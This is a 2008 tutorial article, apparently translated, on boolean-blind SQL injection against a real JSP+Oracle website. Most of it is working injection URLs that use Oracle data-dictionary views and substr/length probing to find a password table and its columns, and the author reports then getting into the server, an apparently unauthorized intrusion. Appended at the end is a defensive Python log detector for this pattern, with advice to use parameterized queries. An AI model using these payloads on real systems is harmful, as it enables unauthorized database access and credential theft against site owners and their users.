A Journey Through JSP+Oracle SQL Injection
  Add date: 07/24/2008   Publishing date: 07/24/2008   Hits: 256
SQL injection has been a hot topic for years, from ASP+MSSQL to PHP+MySQL; wave after wave of people have worked through it, and along the way it has produced masters such as Pskey, small brave and isno, who became the idols of a generation. As long as you use SQL statements flexibly, you may well reap an unexpected harvest and get to feel like a master yourself. This article is written for new recruits, so masters please do not chop me up; I am a new recruit too.

Today, large websites such as banks and government sites generally use JSP+Oracle. Looking at their web applications, the problems are widespread and serious, and I hope programmers and administrators will pay attention to this kind of hidden security risk. Our target today is also a JSP+Oracle website, on which we will carry out an SQL injection test, with the aim of exploring and developing this kind of technique. The target, a Japan-related site: http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797, as shown in Figure 1.

Figure 1

First let us look at Oracle's system (data dictionary) views:

all_tables holds all tables accessible to the current user, its own and other users'.

user_tables holds all tables owned by the current user.

user_tab_columns holds all columns of the current user's tables.

These are the foundation for everything that follows and are very important. Now let us look at the concrete process.

First we need to check whether the system tables exist. Usually they do; if not, there is nothing to play with and you might as well go home and hug the kids. Submit the URL:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from all_tables) and '1 ' = ' 1

This checks whether the system table “all_tables” exists: the clause after “and” compares 0 with the result of the subquery, and if that condition is true the whole statement is true and the page returns normally; otherwise it does not return normally. All the later judgments work on the same principle, which I believe everyone understands, so I will not repeat it. Submit in turn:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables) and '1 ' = ' 1

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns) AND '1 ' = ' 1

The result is returned as shown in Figure 2.

Figure 2

The pages return normally, which shows that the system tables we guessed exist. Now let us see how to guess the other tables (note: in Oracle, table and column names are upper case, so be careful not to get that wrong; functions such as Length() and Substr() are used below, so please consult the relevant documentation).

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables where substr(table_name,1,1)='P') and '1 ' = ' 1

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables where substr(table_name,1,2)='PL') and '1 ' = ' 1

The second letter is L; everyone could also try using Ascii(). So we have found one table whose first character is P and whose second character is L. Sweat! Trying one character at a time; only later did I discover that this step was really unnecessary ......

Next let us look at the length of this table name; once the range is fixed it is easy to guess, otherwise you never know when the guessing will end:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables where length(table_name)>8 and table_name like'%25PL%25') and '1 ' = ' 1

No normal return. It seems the length is not greater than 8, so let us try equal to 8:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables where length(table_name)=8 and table_name like'%25PL%25') and '1 ' = ' 1

Yes! A normal return, so we have determined that the table name is 8 characters long. When guessing you can also use comparisons like the one above to narrow the range. Continuing with the statement above to guess the table name, we finally obtain the table named PLAN_TAB.

TIPS: You can use LIKE here to guess table names, for instance to check whether there are tables such as ADMIN or USERS:

and 0 (select count(*) from user_tables where table_name like '%25ADMIN%25') and '1 ' = ' 1

and 0 (select count(*) from user_tables where table_name like '%25USERS%25') and '1 ' = ' 1

Having guessed the table, we verify it:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables where table_name='PLAN_TAB') and '1 ' = ' 1

Normal return. Our hard work was not wasted in the end, though a lot of cigarettes were sacrificed; but the revolution has not yet succeeded, comrades must keep working hard! Continue by guessing a column name:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='PLAN_TAB' and column_name like '%25PASS%25') and '1 ' = ' 1

I tried the PASS field (which is very easy to think of), but the result was very disappointing: nothing. So what can we do to guess it? See the following method.

It seemed this table had no sensitive column names, and I was a little discouraged. Flipping through the Oracle book again, it suddenly occurred to me that I could query the column names directly, sweat! Probably the fixed mindset from learning MSSQL and MySQL earlier made me forget that Oracle is different. So we simply check directly

whether there are any sensitive column names at all:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where column_name like '%25PASS%25') and '1 ' = ' 1

This checks directly whether there are column names such as PASS and NAME. Testing with LIKE found the three column names ID/NAME/PASSWD, but they may not all be in the same table, so I took LIKE PASS to test. First check the length of the table name corresponding to a PASSWD column:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where column_name like '%25PASS%25' and length(table_name)=8) and '1 ' = ' 1

We get that the table holding the NAME field has a name 8 characters long; continue to guess the corresponding table:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where column_name like '%25PASS%25' and substr(table_name,1,1)='T') and '1 ' = ' 1

Are they in the same table? We will find out. The first character of the table corresponding to PASS is T:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where column_name like '%25PASS%25' and substr(table_name,1,8)='T_PASSWD') and '1 ' = ' 1

Guessing character by character, the method is the same as the table-guessing process above, only with the extra condition “column_name like '%25PASS%25'” in front. Finally we get the table name: T_PASSWD. Then guess the column names matching LIKE ID/NAME/PASSWD in full:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,-2,2)='ID') and '1 ' = ' 1

We can determine that the last two characters are ID; everyone can change the values in Substr() to narrow the range step by step:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,1)='S') and '1 ' = ' 1

The first character is S.

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,2)='ST') and '1 ' = ' 1

The second character is T.

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,3)='STA') and '1 ' = ' 1

The third is A ...... and so on until the eighth character.

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,8)=' STAFF_ID ') and '1 ' = ' 1

From here we can see that it is all the same table. In fact, having met so many poorly written applications, I have never seen one that built separate tables. Finally we obtain the table name T_PASSWD with four columns: STAFF_ID, STS, PASSWORD and LAST_DATE; afterwards I confirmed that these guesses were correct (by getting into the server and looking, as shown in Figure 3).
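As an added defensive example that is not part of the original article, the Python below classifies web-server access-log lines for the Oracle boolean-blind pattern used throughout this walkthrough (quote breakout, subquery on all_tables/user_tables/user_tab_columns, substr/length probing, the '1'='1 tail) and groups dictionary-view probes per client so that a character-by-character schema walk stands out. The log lines, client addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Oracle data dictionary views queried in the walkthrough above.
DICT_VIEWS = ("all_tables", "user_tables", "user_tab_columns")
# Building blocks of the article's boolean-blind requests: a quote breaking out of the
# bulletin_id value, a subquery on a dictionary view, character/length probing, "'1'='1" tail.
PATTERNS = {
    "quote_breakout": re.compile(r"'\s*(and|or)\b", re.I),
    "dict_view": re.compile(r"\bfrom\s+(" + "|".join(DICT_VIEWS) + r")\b", re.I),
    "char_probe": re.compile(r"\b(substr|length|ascii)\s*\(", re.I),
    "tautology": re.compile(r"'\s*1\s*'\s*=\s*'\s*1\b"),
}
# Common Log Format: ip ident user [time] "METHOD target proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def decoded_params(target):
    """Yield each query-string value decoded twice: the article's payloads carry %25
    (an encoded '%') as the LIKE wildcard, and parse_qsl only decodes once."""
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        yield unquote(value)

def classify(line):
    """Return (ip, status, set of matched pattern names), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    hits = {name for value in decoded_params(target)
            for name, rx in PATTERNS.items() if rx.search(value)}
    return ip, int(status), hits

def find_enumeration(lines, min_probes=2):
    """Count distinct dictionary-view probes per client; a client at or above
    min_probes is walking the schema one character at a time, as the article does."""
    probes = defaultdict(set)
    for line in lines:
        parsed = classify(line)
        if parsed and "dict_view" in parsed[2]:
            probes[parsed[0]].add(line)
    return {ip: len(reqs) for ip, reqs in probes.items() if len(reqs) >= min_probes}

# Constructed sample (RFC 5737 addresses, not the article's site); 198.51.100.9 is benign.
P = "/viewBulletin.do?type=C&bulletin_id=200404010797"
SAMPLE_LOG = [
    f'203.0.113.7 - - [24/Jul/2008:10:01:02 +0800] "GET {P} HTTP/1.1" 200 5120',
    f'203.0.113.7 - - [24/Jul/2008:10:01:09 +0800] "GET {P}%27and%200%20(select%20count(*)%20from%20user_tables)%20and%20%271%20%27%20=%20%27%201 HTTP/1.1" 200 5120',
    f'203.0.113.7 - - [24/Jul/2008:10:01:15 +0800] "GET {P}%27and%200%20(select%20count(*)%20from%20user_tab_columns%20where%20substr(table_name,1,1)=%27P%27)%20and%20%271%20%27%20=%20%27%201 HTTP/1.1" 200 5120',
    f'198.51.100.9 - - [24/Jul/2008:10:02:00 +0800] "GET {P} HTTP/1.1" 200 5120',
]
```

Detection like this is a stopgap; the root cause is building the query by concatenating bulletin_id into SQL text, which binding it as a parameter (a JDBC PreparedStatement in the JSP) removes entirely.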